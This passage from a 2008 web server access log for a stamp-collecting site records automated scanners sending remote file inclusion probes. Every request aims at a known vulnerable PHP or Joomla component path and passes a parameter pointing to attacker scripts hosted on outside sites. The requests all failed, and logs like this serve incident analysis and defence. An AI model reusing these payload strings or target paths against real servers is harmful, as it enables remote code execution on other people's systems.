193.233.85.46 - - [06/Jul/2008:22:35:17 -0700] "GET /logs/access.log/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://mobileathleticclub.com/sales-images/index_46.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.233.85.46 - - [06/Jul/2008:22:35:17 -0700] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://mobileathleticclub.com/sales-images/index_46.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.233.85.46 - - [06/Jul/2008:22:35:19 -0700] "GET /logs/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://mobileathleticclub.com/sales-images/index_46.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
74.63.2.169 - - [06/Jul/2008:22:40:00 -0700] "GET /administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.fo-saverne.com/images/temp/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
74.63.2.169 - - [06/Jul/2008:22:40:00 -0700] "GET /logs/access_080331.log/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.fo-saverne.com/images/temp/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
74.63.2.169 - - [06/Jul/2008:22:40:00 -0700] "GET /logs/access_080526.log/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.fo-saverne.com/images/temp/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
74.63.2.169 - - [06/Jul/2008:22:40:00 -0700] "GET /logs/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.fo-saverne.com/images/temp/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
193.233.85.46 - - [06/Jul/2008:22:40:29 -0700] "GET /logs/access_080505.log//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://mobileathleticclub.com/sales-images/index_46.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.233.85.46 - - [06/Jul/2008:22:40:29 -0700] "GET //index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://mobileathleticclub.com/sales-images/index_46.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.233.85.46 - - [06/Jul/2008:22:40:30 -0700] "GET /logs//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://mobileathleticclub.com/sales-images/index_46.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.233.85.46 - - [06/Jul/2008:22:40:49 -0700] "GET /logs/access_080609.log//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://mobileathleticclub.com/sales-images/index_46.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.250.2.28 - - [06/Jul/2008:22:41:31 -0700] "GET //index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://jeffery.wewokawoods.org/components/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
193.233.85.46 - - [06/Jul/2008:22:43:44 -0700] "GET /logs/access_080526.log//%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.php?mosConfig_absolute_path=http://dianadigsdirt.com/blog/wp-content/uploads/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.233.85.46 - - [06/Jul/2008:22:43:45 -0700] "GET //%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.php?mosConfig_absolute_path=http://dianadigsdirt.com/blog/wp-content/uploads/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.233.85.46 - - [06/Jul/2008:22:43:46 -0700] "GET /logs//%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.php?mosConfig_absolute_path=http://dianadigsdirt.com/blog/wp-content/uploads/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
81.29.195.59 - - [06/Jul/2008:22:45:05 -0700] "GET /logs/access_080505.log//oneadmin/photogallery/include.php?path[docroot]=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
81.29.195.59 - - [06/Jul/2008:22:45:05 -0700] "GET /logs/access_080505.log/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
81.29.195.59 - - [06/Jul/2008:22:45:06 -0700] "GET //oneadmin/photogallery/include.php?path[docroot]=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
81.29.195.59 - - [06/Jul/2008:22:45:07 -0700] "GET /errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
81.29.195.59 - - [06/Jul/2008:22:45:07 -0700] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4